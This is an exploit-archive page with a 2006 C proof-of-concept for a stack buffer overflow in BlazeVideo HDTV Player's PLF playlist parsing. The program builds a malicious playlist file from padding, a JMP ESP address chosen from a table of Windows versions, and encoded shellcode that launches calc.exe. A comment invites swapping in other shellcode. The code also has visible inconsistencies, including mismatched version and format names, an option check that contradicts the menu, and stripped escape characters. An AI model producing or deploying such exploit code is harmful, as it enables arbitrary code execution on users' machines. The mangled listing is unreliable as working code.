BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC
# Published : 2006-12-01
# Author : Greg Linares
# Previous Title : DeepBurner 1.8.0 .dbr File Parsing Buffer Overflow Exploit
# Next Title : VUPlayer <= 2.44 (M3U UNC Name) Buffer Overflow Exploit (c)
/*
========================================================================
0-day BlazeVideo HDTV Player <= v2.1 Malformed PLF Buffer Overflow PoC
========================================================================
BlazeVideo HDTV v2.1 and prior fails to properly handle large file paths inside
PLF files, the result is a stack based buffer overflow that allows an
attacker to execute code in the context of the player.

This exploit should also work for BlazeDVD v5.0, but i havent gotten
around to testing it.

C: + [BUFFER x 257 bytes] + [JMP] + [16 Garbage bytes] + [SHELLCODE in ESP]


Happy Hunting and Happy Holidays to everyone


<insert super awesome leet ascii art here>

30 days of Media Player Exploits by Greg Linares

Discovered and Reported By: Greg Linares GLinares.code@gmail.com
Reported Exploit Date: 12/1/2006

*/




#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{

       FILE *Exploit;


       /* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
       unsigned char scode[] =
       "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
       "YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
       "5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
       "LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
       "sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";


       /* replace it with your own shellcode :) */


       int JMP, x;

       printf("n======================================================================n");
       printf("BlazeVideo HDTV Player <= v2.3 M3U Buffer Overflow Exploitn");
       printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>n");
       printf("Usage: %s <output PLF file> <JMP>n", argv[0]);
       printf("n JMP Optionsn");
       printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>n");
       printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>n");
       printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>n");
       printf("4 = English Windows 2000 SP 4 User32.dll  <JMP ESP 0x77e3c256>n");
       printf("5 = French Windows XP Pro SP2  <JMP ESP 0x77d8519f> n");
       printf("6 = German/Italian/Dutch/Polish Windows XP SP2  <JMP ESP 0x77d873a0> n");
       printf("7 = Spainish Windows XP Pro SP2 <JMP ESP 0x77d9932f> n");
       printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 <JMP ESP 0x77e04c29>n");
       printf("9 = French/Italian/Chineese Windows 2000 Server SP4 <JMP ESP 0x77df4c29>n");
       printf("====================================================================nnn");


       /* thanks metasploit and jerome for opcodes */

       if (argc < 2) {
               printf("Invalid Number Of Argumentsn");
               return 1;
       }


       Exploit = fopen(argv[1],"w");
   if ( !Exploit )
   {
       printf("nCouldn't Open File!");
       return 1;
   }



       fputs("C:\", Exploit);

       for (x=0;x<257;x++) {
               fputs("A", Exploit);
       }


       if (atoi(argv[2]) <= 0) {
               JMP = 1;
       } else if (atoi(argv[2]) > 4) {
               JMP = 1;
       } else {
               JMP = atoi(argv[2]);
       }
       switch(JMP) {
               case 1:
                       printf("Using English Windows XP SP2 JMP...n");
                       fputs("xbcx41xdbx77", Exploit);
                       break;
               case 2:
                       printf("Using English Windows XP SP1 JMP...n");
                       fputs("xfcx18xd7x77", Exploit);
                       break;
               case 3:
                       printf("Using English Windows 2003 SP0 & SP1 JMP...n");
                       fputs("xdcx4axd7x77", Exploit);
                       break;
               case 4:
                       printf("Using English Windows 2000 SP 4 JMP...n");
                       fputs("x56xc2xe3x77", Exploit);
                       break;
               case 5:
                       printf("Using French Windows XP SP 2 JMP...n");
                       fputs("x9fx51xd8x77", Exploit);
                       break;
               case 6:
                       printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...n");
                       fputs("xa0x73xd8x77", Exploit);
                       break;
               case 7:
                       printf("Using Spainish Windows XP SP 2 JMP...n");
                       fputs("x2fx93xd9x77", Exploit);
                       break;
               case 8:
                       printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...n");
                       fputs("x29x4cxe0x77", Exploit);
                       break;
               case 9:
                       printf("Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...n");
                       fputs("x29x4cxdfx77", Exploit);
                       break;

       }

       for (x=0;x<16;x++) {
               fputs("x58", Exploit);
       }
       fputs(scode, Exploit);
       fputs("rn", Exploit);


       printf("Exploit Succeeded...n Output File: %snn", argv[1]);


       printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)n");
       printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Coden");
       fclose(Exploit);
       return 0;
}

// www.Syue.com [2006-12-01]